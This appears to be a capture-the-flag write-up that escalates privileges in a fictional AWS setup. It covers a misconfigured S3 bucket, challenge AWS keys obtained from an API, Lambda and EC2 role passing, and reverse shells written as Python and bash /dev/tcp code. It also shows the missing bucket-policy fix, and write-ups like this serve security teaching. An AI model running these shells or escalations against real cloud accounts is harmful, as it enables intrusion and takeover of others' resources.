We have received intelligence that Palindrome has set up a global computing infrastructure that its agents can use to spin up C2 instances. They rely on Cloud Service Providers like AWS to provide computing resources for their agents. They have their own custom-built access system e-service portal that generates short-lived credentials for their agents to use their computing infrastructure. It is said that their access system e-service is disguised as a blog site.
We need your help to access their computing resources and exfiltrate any meaningful intelligence for us.
Start here: http://d20whnyjsgpc34.cloudfront.net
NOTE: Solving challenge 4B allows you to complete level 4, but unlocks challenge 5B only!
Solution
Dumping S3 Bucket
Visiting the webpage, we see the following clues in the HTML source.
<div class="p-5 text-center bg-light">
<!-- Passcode -->
<h1 class="mb-3">Cats rule the world</h1>
<!-- Passcode -->
<!--
----- Completed -----
* Configure CloudFront to use the bucket - palindromecloudynekos as the origin
----- TODO -----
* Configure custom header referrer and enforce S3 bucket to only accept that particular header
* Secure all object access
-->
<h4 class="mb-3">—ฅ/ᐠ. ̫ .ᐟ\ฅ —</h4>
</div>
Here's what this is referring to: CloudFront is Amazon's CDN and can be configured to use an S3 bucket as its origin. CloudFront then serves the static page from the files in that bucket. But even so, a user could still access the S3 bucket directly. The missing step here is to restrict direct access to the S3 bucket to authenticated requests from CloudFront, using an Origin Access Identity (OAI).
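For reference, the lockdown they never finished would look something like the following bucket policy, which allows reads only through a specific CloudFront OAI (the OAI ID here is a placeholder, not one from the challenge):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowCloudFrontOAIOnly",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::cloudfront:user/CloudFront Origin Access Identity EXAMPLEOAIID"
      },
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::palindromecloudynekos/*"
    }
  ]
}
```

With a policy like this in place (and public access blocked), the direct bucket reads below would have failed.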
The S3 bucket in its current state is readable by all authenticated users, so we can simply log in to our own AWS account and use the AWS CLI to access the palindromecloudynekos bucket.
$ aws s3 cp s3://palindromecloudynekos . --recursive
download: s3://palindromecloudynekos/index.html to ./index.html
download: s3://palindromecloudynekos/error.html to ./error.html
download: s3://palindromecloudynekos/api/notes.txt to api/notes.txt
download: s3://palindromecloudynekos/img/photo6.jpg to img/photo6.jpg
download: s3://palindromecloudynekos/img/photo2.jpg to img/photo2.jpg
download: s3://palindromecloudynekos/img/photo4.jpg to img/photo4.jpg
download: s3://palindromecloudynekos/img/photo3.jpg to img/photo3.jpg
download: s3://palindromecloudynekos/img/photo5.jpg to img/photo5.jpg
download: s3://palindromecloudynekos/img/photo1.jpg to img/photo1.jpg
This gives us the next clue.
api/notes.txt
# Neko Access System Invocation Notes
Invoke with the passcode in the header "x-cat-header". The passcode is found on the cloudfront site, all lower caps and separated using underscore.
https://b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com/prod/agent
All EC2 computing instances should be tagged with the key: 'agent' and the value set to your username. Otherwise, the antivirus cleaner will wipe out the resources.
As we saw earlier, the passcode is "Cats rule the world", which lowercased and underscore-separated becomes cats_rule_the_world, sent in the x-cat-header header. By sending the appropriate request to the API endpoint, we get a set of AWS credentials.
GET /prod/agent HTTP/2
Host: b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com
X-Cat-Header: cats_rule_the_world

HTTP/2 200 OK
Date: Mon, 12 Sep 2022 14:06:30 GMT
Content-Type: application/json
Content-Length: 296
Access-Control-Allow-Origin: *
Apigw-Requestid: YWZzigwJSQ0EPvw=

{"Message": "Welcome there agent! Use the credentials wisely! It should be live for the next 120 minutes! Our antivirus will wipe them out and the associated resources after the expected time usage.", "Access_Key": "AKIAQYDFBGMS7BGNBM64", "Secret_Key": "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"}
Enumerating Permissions
It was at this point that I tried different enumeration tools such as enumerate-iam and Pacu. Pacu comes with a ton of useful modules, which came in handy later on.
A few more hours of staring at AWS documentation later, I decided to try Pacu's whoami command, and surprisingly, Pacu had already stored a ton of useful information.
In particular, we had lambda:CreateFunction, lambda:InvokeFunction and iam:PassRole privileges.
The reason these did not show up in enumerate-iam is probably that enumerate-iam only does a naive brute force, attempting to invoke each privilege without the specific resource format required in this challenge (e.g. arn:aws:lambda:ap-southeast-1:051751498533:function:${aws:username}-*).
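In other words, the Lambda permissions are probably scoped with a resource constraint along these lines (a reconstruction based on the ARN pattern above, not the actual challenge policy):

```json
{
  "Effect": "Allow",
  "Action": ["lambda:CreateFunction", "lambda:InvokeFunction"],
  "Resource": "arn:aws:lambda:ap-southeast-1:051751498533:function:${aws:username}-*"
}
```

A blind brute-forcer creating a function with an arbitrary name would be denied, even though the permission exists.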
At this point we can consult this great resource by Bishop Fox that provides a nice table breakdown of different AWS privilege escalation techniques. Our current permissions correspond to technique 15 here, which involves creating a Lambda function that assumes a privileged role, thus executing code with higher privileges.
First, we create a Python script that gives us a reverse shell.
import os
import socket
import subprocess

def lambda_handler(event, context):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("HOST", PORT))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])
Then we zip this up as function.zip and create a Lambda function whose name adheres to the format above. Using --role, we pass the lambda_agent_development_role to this Lambda function.
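Concretely, the steps look something like this. The function name, listener address, and username are placeholders, and the role ARN is an assumption built from the account ID and role name seen elsewhere in the challenge:

```shell
# Write the reverse-shell handler (the listener address is a placeholder)
cat > lambda_function.py <<'EOF'
import os
import socket
import subprocess

def lambda_handler(event, context):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("HOST", 4444))  # placeholder: our listener host/port
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])
EOF

# Package it; python's stdlib zipfile module avoids needing the zip utility
python3 -m zipfile -c function.zip lambda_function.py

# The actual AWS calls need the short-lived credentials from the API,
# so they are gated behind an environment variable here
if [ -n "${RUN_AWS:-}" ]; then
  AGENT=your_username   # must match ${aws:username} in the policy
  aws lambda create-function \
    --function-name "${AGENT}-shell" \
    --runtime python3.9 \
    --handler lambda_function.lambda_handler \
    --zip-file fileb://function.zip \
    --role arn:aws:iam::051751498533:role/lambda_agent_development_role
  aws lambda invoke --function-name "${AGENT}-shell" out.json
fi
```

With a listener waiting (e.g. nc -lvnp 4444), invoking the function pops a shell running as the passed role.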
Now that we have access to lambda_agent_development_role, let's see how we can leverage our newfound permissions. After enumerating permissions again with our trusty enumeration scripts, we find out that we now have the permission to create EC2 instances.
At this point we need to remember this piece of information given to us early in the challenge, telling us the tags that are required.
All EC2 computing instances should be tagged with the key: 'agent' and the value set to your username. Otherwise, the antivirus cleaner will wipe out the resources.
Our current permissions now correspond to technique 3 here, involving the iam:PassRole and ec2:RunInstances permissions. Essentially, we could pass in an --iam-instance-profile to assign a role to the EC2 instance.
But in order to leverage our newfound privileges, we need a way to access the newly created EC2 instance. In this article, the authors assigned SSH key pairs and connected through the public IP address of the EC2 instance.
The user needs to have some way to SSH into the newly created instance.
In the example below, the user assigns a public SSH key stored in AWS to the instance and the user has access to the matching private key.
In this challenge, however, this method does not seem quite so feasible (in particular, I had a hard time figuring out how to get the public IP of the instance, since we only had access to run-instances but not describe-instances).
It turned out there was a way to do this using idempotency tokens, which allow us to retrieve updated information about the result of a previous command. As this was not my solution, I won't discuss it in detail.
Idempotency ensures that an API request completes no more than one time. With an idempotent request, if the original request completes successfully, any subsequent retries complete successfully without performing any further actions. However, the result might contain updated information, such as the current creation status.
After a bit more googling, I came across this blog post describing a scenario similar to ours. It turns out that the user-data option can be used to execute a script on startup; it is meant to help perform common configuration and setup tasks when provisioning an EC2 instance.
Piecing it all together, we can modify our previous lambda function to spawn an EC2 instance that runs a reverse shell on startup.
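A sketch of that final step, as the CLI commands the Lambda would run. The AMI ID, instance profile name, listener address, and username are placeholders, and the agent tag follows the requirement from the notes above:

```shell
# Startup script: open a reverse shell back to our listener on boot
cat > userdata.sh <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKER_HOST/4444 0>&1   # placeholder listener address
EOF

# The real AWS call needs the escalated credentials, so it is gated here
if [ -n "${RUN_AWS:-}" ]; then
  AGENT=your_username
  aws ec2 run-instances \
    --image-id ami-xxxxxxxx \
    --instance-type t2.micro \
    --iam-instance-profile Name=some_privileged_profile \
    --tag-specifications "ResourceType=instance,Tags=[{Key=agent,Value=${AGENT}}]" \
    --user-data file://userdata.sh
  # No describe-instances needed: the instance phones home to us on startup
fi
```

The tag-specifications flag satisfies the "antivirus cleaner" requirement, and user-data sidesteps the missing describe-instances permission entirely, since the instance connects back to us.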